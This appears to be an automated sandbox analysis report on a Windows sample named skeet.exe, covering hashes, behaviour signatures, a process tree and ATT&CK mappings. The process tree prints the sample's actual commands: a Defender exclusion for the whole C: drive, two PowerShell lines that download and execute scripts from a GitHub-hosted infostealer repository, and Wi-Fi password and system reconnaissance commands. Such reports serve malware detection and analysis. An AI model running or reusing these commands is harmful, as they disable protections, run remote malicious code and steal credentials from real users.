Analysis
-
max time kernel
65s -
max time network
67s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17/10/2024, 09:14
Behavioral task
behavioral1
Sample
skeet.exe
Resource
win10v2004-20241007-en
General
-
Target
skeet.exe
-
Size
9.8MB
-
MD5
5caf8a4e165d0ede23ca16c1954e6e4e
-
SHA1
298f055ae4c3fee613b994c2450454b4ca311abe
-
SHA256
889fcffb92c1e52ec1ed263476298bf0dee82c5dddbcf0e5e0c9e6c42cfd55b0
-
SHA512
74e5950bd46e169ad3583f2155b2ef414e6f862fd26bbf1f32bc3b91a0ef03e15b76967d58661b3a1d273303f12103d650b659ddc6684be5de0e58746dc52c97
-
SSDEEP
98304:C3BUxzQ38BsPGlgw97DB7prt8EREv/lLl8EnGpaeiWZ:C3138Bdxiv/lLl8PZ
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 13 2268 powershell.exe 14 4852 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 3592 powershell.exe 2268 powershell.exe 4852 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 4212 netsh.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 12 raw.githubusercontent.com 13 raw.githubusercontent.com 14 raw.githubusercontent.com -
pid Process 1532 ARP.EXE -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4540 netsh.exe 2900 netsh.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 1092 NETSTAT.EXE -
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
pid Process 1092 NETSTAT.EXE 2272 ipconfig.exe 1520 ipconfig.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4852 powershell.exe 2268 powershell.exe 3592 powershell.exe 4852 powershell.exe 3592 powershell.exe 2268 powershell.exe 4852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4852 powershell.exe Token: SeDebugPrivilege 2268 powershell.exe Token: SeDebugPrivilege 3592 powershell.exe Token: SeIncreaseQuotaPrivilege 4852 powershell.exe Token: SeSecurityPrivilege 4852 powershell.exe Token: SeTakeOwnershipPrivilege 4852 powershell.exe Token: SeLoadDriverPrivilege 4852 powershell.exe Token: SeSystemProfilePrivilege 4852 powershell.exe Token: SeSystemtimePrivilege 4852 powershell.exe Token: SeProfSingleProcessPrivilege 4852 powershell.exe Token: SeIncBasePriorityPrivilege 4852 powershell.exe Token: SeCreatePagefilePrivilege 4852 powershell.exe Token: SeBackupPrivilege 4852 powershell.exe Token: SeRestorePrivilege 4852 powershell.exe Token: SeShutdownPrivilege 4852 powershell.exe Token: SeDebugPrivilege 4852 powershell.exe Token: SeSystemEnvironmentPrivilege 4852 powershell.exe Token: SeRemoteShutdownPrivilege 4852 powershell.exe Token: SeUndockPrivilege 4852 powershell.exe Token: SeManageVolumePrivilege 4852 powershell.exe Token: 33 4852 powershell.exe Token: 34 4852 powershell.exe Token: 35 4852 powershell.exe Token: 36 4852 powershell.exe Token: SeIncreaseQuotaPrivilege 4852 powershell.exe Token: SeSecurityPrivilege 4852 powershell.exe Token: SeTakeOwnershipPrivilege 4852 powershell.exe Token: SeLoadDriverPrivilege 4852 powershell.exe Token: SeSystemProfilePrivilege 4852 powershell.exe Token: SeSystemtimePrivilege 4852 powershell.exe Token: SeProfSingleProcessPrivilege 4852 powershell.exe Token: SeIncBasePriorityPrivilege 4852 powershell.exe Token: SeCreatePagefilePrivilege 4852 powershell.exe Token: SeBackupPrivilege 4852 powershell.exe Token: SeRestorePrivilege 4852 powershell.exe Token: SeShutdownPrivilege 4852 powershell.exe Token: SeDebugPrivilege 4852 powershell.exe Token: SeSystemEnvironmentPrivilege 4852 powershell.exe Token: SeRemoteShutdownPrivilege 4852 powershell.exe Token: SeUndockPrivilege 4852 powershell.exe Token: SeManageVolumePrivilege 4852 powershell.exe Token: 33 4852 powershell.exe Token: 34 4852 powershell.exe Token: 35 4852 powershell.exe Token: 36 4852 powershell.exe Token: SeIncreaseQuotaPrivilege 4852 powershell.exe Token: SeSecurityPrivilege 4852 powershell.exe Token: SeTakeOwnershipPrivilege 4852 powershell.exe Token: SeLoadDriverPrivilege 4852 powershell.exe Token: SeSystemProfilePrivilege 4852 powershell.exe Token: SeSystemtimePrivilege 4852 powershell.exe Token: SeProfSingleProcessPrivilege 4852 powershell.exe Token: SeIncBasePriorityPrivilege 4852 powershell.exe Token: SeCreatePagefilePrivilege 4852 powershell.exe Token: SeBackupPrivilege 4852 powershell.exe Token: SeRestorePrivilege 4852 powershell.exe Token: SeShutdownPrivilege 4852 powershell.exe Token: SeDebugPrivilege 4852 powershell.exe Token: SeSystemEnvironmentPrivilege 4852 powershell.exe Token: SeRemoteShutdownPrivilege 4852 powershell.exe Token: SeUndockPrivilege 4852 powershell.exe Token: SeManageVolumePrivilege 4852 powershell.exe Token: 33 4852 powershell.exe Token: 34 4852 powershell.exe -
Suspicious use of WriteProcessMemory 44 IoCs
description pid Process procid_target PID 2148 wrote to memory of 3592 2148 skeet.exe 85 PID 2148 wrote to memory of 3592 2148 skeet.exe 85 PID 2148 wrote to memory of 2268 2148 skeet.exe 86 PID 2148 wrote to memory of 2268 2148 skeet.exe 86 PID 2148 wrote to memory of 4852 2148 skeet.exe 88 PID 2148 wrote to memory of 4852 2148 skeet.exe 88 PID 4852 wrote to memory of 4120 4852 powershell.exe 93 PID 4852 wrote to memory of 4120 4852 powershell.exe 93 PID 4120 wrote to memory of 4948 4120 csc.exe 94 PID 4120 wrote to memory of 4948 4120 csc.exe 94 PID 4852 wrote to memory of 4540 4852 powershell.exe 95 PID 4852 wrote to memory of 4540 4852 powershell.exe 95 PID 4852 wrote to memory of 2348 4852 powershell.exe 98 PID 4852 wrote to memory of 2348 4852 powershell.exe 98 PID 2348 wrote to memory of 3264 2348 net.exe 99 PID 2348 wrote to memory of 3264 2348 net.exe 99 PID 4852 wrote to memory of 4212 4852 powershell.exe 100 PID 4852 wrote to memory of 4212 4852 powershell.exe 100 PID 4852 wrote to memory of 2116 4852 powershell.exe 103 PID 4852 wrote to memory of 2116 4852 powershell.exe 103 PID 4852 wrote to memory of 4272 4852 powershell.exe 104 PID 4852 wrote to memory of 4272 4852 powershell.exe 104 PID 4272 wrote to memory of 4968 4272 net.exe 105 PID 4272 wrote to memory of 4968 4272 net.exe 105 PID 4852 wrote to memory of 1520 4852 powershell.exe 106 PID 4852 wrote to memory of 1520 4852 powershell.exe 106 PID 4852 wrote to memory of 4676 4852 powershell.exe 107 PID 4852 wrote to memory of 4676 4852 powershell.exe 107 PID 4676 wrote to memory of 4620 4676 net.exe 108 PID 4676 wrote to memory of 4620 4676 net.exe 108 PID 4852 wrote to memory of 4480 4852 powershell.exe 110 PID 4852 wrote to memory of 4480 4852 powershell.exe 110 PID 4852 wrote to memory of 1092 4852 powershell.exe 111 PID 4852 wrote to memory of 1092 4852 powershell.exe 111 PID 4852 wrote to memory of 4772 4852 powershell.exe 112 PID 4852 wrote to memory of 4772 4852 powershell.exe 112 PID 4852 wrote to memory of 2272 4852 powershell.exe 113 PID 4852 wrote to memory of 2272 4852 powershell.exe 113 PID 4852 wrote to memory of 5112 4852 powershell.exe 114 PID 4852 wrote to memory of 5112 4852 powershell.exe 114 PID 4852 wrote to memory of 1532 4852 powershell.exe 117 PID 4852 wrote to memory of 1532 4852 powershell.exe 117 PID 4852 wrote to memory of 2900 4852 powershell.exe 118 PID 4852 wrote to memory of 2900 4852 powershell.exe 118
Processes
-
C:\Users\Admin\AppData\Local\Temp\skeet.exe"C:\Users\Admin\AppData\Local\Temp\skeet.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C "Add-MpPreference -ExclusionPath 'C:'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sbjdvwma\sbjdvwma.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E15.tmp" "c:\Users\Admin\AppData\Local\Temp\sbjdvwma\CSC60F77C2CB016400CBE5387D18B2CE1B4.TMP"4⤵PID:4948
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4540
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵PID:3264
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall show allprofiles3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4212
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵PID:2116
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" user3⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵PID:4968
-
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns3⤵
- Gathers network information
PID:1520
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup3⤵
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵PID:4620
-
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" startup get command caption3⤵PID:4480
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano3⤵
- System Network Connections Discovery
- Gathers network information
PID:1092
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe3⤵PID:4772
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all3⤵
- Gathers network information
PID:2272
-
-
C:\Windows\system32\ROUTE.EXE"C:\Windows\system32\ROUTE.EXE" print3⤵PID:5112
-
-
C:\Windows\system32\ARP.EXE"C:\Windows\system32\ARP.EXE" -a3⤵
- Network Service Discovery
PID:1532
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2900
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
192B
MD572d8a1c03b9fc394f0ad124990964a82
SHA19b91dccfc411f3f07639241080a104cd8ec6b907
SHA2567dc1274192dea71c411659e3dc04b9a1d10f0f2f26b2a12801a7cb04cc02dfed
SHA5125dccd670dafefceaba06ee80843a10912dc39dfe954cc62cfa1426feb20b90c69ee7a3be00a43b48602086f459f595934d569f80e9ec91eab6ad02bb57b5c700
-
Filesize
1KB
MD576bb094bc0304e5ff8dba4a589283977
SHA1555bf7b01d28c0bbd750417942e04150822060ae
SHA256aeed2f53ea15ff740eaf33b3f6b47c75f7e6201736d82715c58d9f88176388b8
SHA5122cd044e53f2bda79e0412227813dfee9a1a440e3ac12818a5430cc38ef066c332106dcff6960a49fc0a52fd7c6dd6db5b4b2812c2ee859a48413f97368389b47
-
Filesize
1KB
MD514d67f35af5ab9a08a42737866ec7e65
SHA1790568260765c7b737fa7bbca4aa7f580079f31e
SHA25617534dbe64cb900ac7a6ecbba64a9eb068b5df2ea6a0c43d140d9a0581390297
SHA512ed72785316fe9c0f760806091e733bb6f97aac1453f2ae766a69c574e735c79f45f20b2e5e2815d8938fdc55f4d0138301d72bebede8873cf176acd6f66af785
-
Filesize
408KB
MD551be6b25d4ae522b62774080eadc8317
SHA132ee013c77b6cb0be90ef29cbedbe366270ab9af
SHA256074a17034b1b488468433db6772d711984d2fe8eafc58e02d7bc2ccb8cbbaee0
SHA5124ab44f7e7316edc31fda3e3fde2f5deef7fb18be47e8fb928790ae381853eb4baaa345520e8906381f2d6afa942a2a10794658792b1fc198ba357bd047310447
-
Filesize
23KB
MD51d8d933542597b22374b5a409da0a93a
SHA1395dfaf1e4058c5bef3eb97f38ad5f952fea23cc
SHA2569c7202f66643055567fdbc4fcce850474937170e6d1379062e64c81c62c600b7
SHA51273a0ecf58d36dd2313d33839824984fa9b22932d791431cc2c047a015c36b6733edbc4e5a88fe458588082aed5f63c11a91c0731a69b8f21a8c2dd4c1374d6df
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5e6d908952ebb5ece48022ba01b366a95
SHA1fbd4488a9152c71b517878968ee32fb9fffb3f74
SHA256077252361ff6ac1eb869d21f3fb84ce23c99d5bac9e92ef0868b5d209e92b26b
SHA5125bafdba49a5811775fcf550203fa6b0619d189ae7a5f3f963f5c2617eab88100bab6037359a65018c0068d12402e98ad2d82874fbaeaad3beebd518f5912ce01
-
Filesize
652B
MD58799949be1690da7c6c9296c2dcfbac3
SHA1bdcd407d1c22b35add32b114533aa1ba0b9d3504
SHA2567c79b78cc7405aebf03613657d8b52fb6976a6a5aa1695f2e8d60402b2e93d3d
SHA5127d4be9929181551b104adba7225bb3442cc895ead3ff922446b94b934ccc9baeb79a359869ec1ba6ff4d6c6070ac3a173865a427aad5ff7ca583e2fcb658701c
-
Filesize
1KB
MD58a1e7edb2117ec5dde9a07016905923b
SHA10155dbeeb16333e2eaa767b0209750efee56f47f
SHA256c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007
SHA5124ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21
-
Filesize
369B
MD5fb56f73da02fc735a172aa4c23237392
SHA1f38ee48dc4b2be478de6a1fb30b3519875c51354
SHA256b41a40a56b2757db79020cb0f5d8430cec9ab743bae9c175c0e470a68bf0d3a2
SHA5120f35093c7ae34965ad86baf85cbd9d1a538869f5daa63aef1fbdbb9cb79d93a609c479d05a08f34426953ffe8db776dc6536033ee44f93dcb5fa43456e74cff7